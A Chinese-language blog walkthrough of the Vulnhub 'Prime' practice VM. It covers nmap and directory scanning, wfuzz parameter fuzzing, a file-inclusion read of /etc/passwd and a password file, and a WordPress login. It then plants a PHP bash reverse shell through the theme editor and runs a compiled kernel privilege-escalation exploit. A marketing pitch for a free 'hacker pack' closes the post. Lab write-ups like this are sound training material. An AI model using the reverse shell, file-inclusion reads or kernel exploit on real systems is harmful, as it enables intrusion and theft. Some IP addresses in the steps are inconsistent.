【网络安全渗透测试零基础入门必知必会】之Vulnhub靶机Prime使用指南,零基础入门到精通,收藏这一篇就够了

422 篇文章 3 订阅
422 篇文章 4 订阅

前言

这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段Vulnhub靶场实战阶段第1篇。

喜欢的朋友们,记得给大白点赞支持和收藏一下,关注我,学习黑客技术。

环境配置

prime是vulnhub中的一台用于OSCP考试练习的的靶机,链接见:

Prime: 1 ~ VulnHub

下载好之后解压,用vmware打开即可,网络适配器设置为NAT模式,靶机启动之后可以看到一个Ubuntu的登录界面:

使用Moba连接到kali

一、Namp扫描

1、主机存活判断

获取主机ip

扫描C段网络

可以先关闭靶机,再打开确定靶机ip为192.168.41.137

2、快速扫描

先进入工作目录

sudo nmap --min-rate 10000 -p- 192.168.41.137 -oA nmapscan/ports

–min-rate #以不低于xxx的速度扫描
-p- #全端口
-oA #将扫描结果输出保存到某个文件夹下某个文件 例子是放在nmap目录下叫ports文件

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

sudo nmap -sT -sV -O -p22,80 192.168.41.137 -oA nmapscan/tcp_detail

-sT #以TCP协议进行扫描
-sV #服务的版本号
-O #服务器系统
-p #指定端口
-oA #将扫描结果输出保存到某个文件夹下某个文件 例子是放在nmapscan目录下叫tcp_detail文件

4、UDP扫描

sudo nmap -sU -p22,80 192.168.41.137 -oA nampscan/udp_detail

-sU #以UDP协议扫描
-p #指定端口
-oA #将扫描结果输出保存到某个文件夹下某个文件 例子是放在report目录下叫heavy-U文件

5、Namp的POC扫描

sudo nmap --script=vuln -p22,80 192.168.41.137 -oA nmapscan/vuln

没有发现漏洞点

以上完成nmap四扫,所有扫描结果保存在nmapscan文件夹中

二、目录扫描

1、找正确参数

靶机开启了web和ssh服务,先访问web服务

扫描目录

dirsearch -u “192.168.41.137” -o `pwd`/url

访问http://192.168.41.137:80/secret.txt

根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file

先进行爆破,利用筛选机制选出不一样的返回值推测出正确的参数

sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.41.137/index.php?FUZZ=ss

-c #wfuzz用来结果分色
-w #指定使用的字典
-hh #过滤返回字符串不是136的参数
FUZZ #可以跟一个参数(ss)或不加

带着获得的正确参数尝试去访问一下,提示干的好,但你请求了错误文件
http://192.168.32.140/index.php?file

查看之前secet.txt的提示说查看本地的location.txt文件
//查看location.txt,您将获得下一步行动//

http://192.168.41.137/index.php?file=location.txt

访问另一个php页面

插曲:

发现第一个php中看起来像有个任意文件读取,但发现只允许传入localtaion.txt

在第二个界面尝试任意文件读取

2、文件包含漏洞利用

http://192.168.41.137/image.php?secrettier360=/etc/passwd

/etc/passwd中的账户信息有很多,重点观察有bash环境的:

3、获得密码

发现敏感信息

http://192.168.41.137/image.php?secrettier360=/home/saket/password.txt

三、WordPress攻击

前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码

sudo wpscan --url http://192.168.41.137/wordpress -e u
-e #选择需要获得的内容 u是获得用户名

利用wpscan获得的用户名victor和前面获得的密码follow_the_ippsec成功登陆了WordPress后台,

2、WordPress后台利用

1、WordPress插件

先看WordPress的插件,新增插件

随便尝试上传一个.zip的压缩包提示错误,当前父目录是有写权限的嘛

2、WordPress主题

主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。

从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。此时因为是WordPress,所以
我们就尝试些一个php的反弹shell让它去执行。

写一个php的反弹shell,提交shell后就是找到php页面去触发它

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.41.137/1234 0>&1'"); ?>

访问url触发shell

http://your-site.com/wp-content/themes/your-theme-name/secret.php
其中 your-site.com 是你的 WordPress 网站域名,
your-theme-name 是你所使用的主题名称,
secret.php 是你创建的 PHP 文件名。请确保正确替换这些参数,才能成功访问该文件。

获得shell

四、内网提权

1、查看系统详情

2、查看当前系统用户

cd /home
ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。
也会是每个用户的数据是存储在该目录下面的一个子目录中。

3、查看定时任务

发现有个定时任务t.sh,但是它没有任何用户权限所以pass

4、查看系统用户信息

5、系统内核提权

1、查找攻击脚本

前面发现当前ubuntu版本相对较低,尝试内核提权,使用系统版本去查是否有版本漏洞。发现只有2和3是权限提升相关的

searchsploit Linux ubuntu 4.10.0-28

Linux内核4.10.5/<4.14.3(Ubuntu)-DCCP套接字免费使用|Linux/dos/43234.c
Linux内核<4.13.9(Ubuntu 16.04/Fedora 27)-本地权限升级|Linux/Local/45010.c
Ubuntu<15.10-PT Chown任意PT通过用户命名空间权限升级访问|linux/local/41760.txt

2、下载攻击脚本

3、查看具体使用方法

先编译,后直接利用执行

gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995

4、本地搭建服务器

攻击机本地搭建一个80端口服务器供下载文件

sudo php -S 0:80

受害靶机使用wget下载攻击机的利用文件

5、EXP提权

提权成功

网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

282G网络安全/黑客技术入门学习大礼包》,可以扫描下方二维码免费领取

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

朋友们需要全套共282G的《网络安全/黑客技术入门学习大礼包》,可以扫描下方二维码免费领取

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值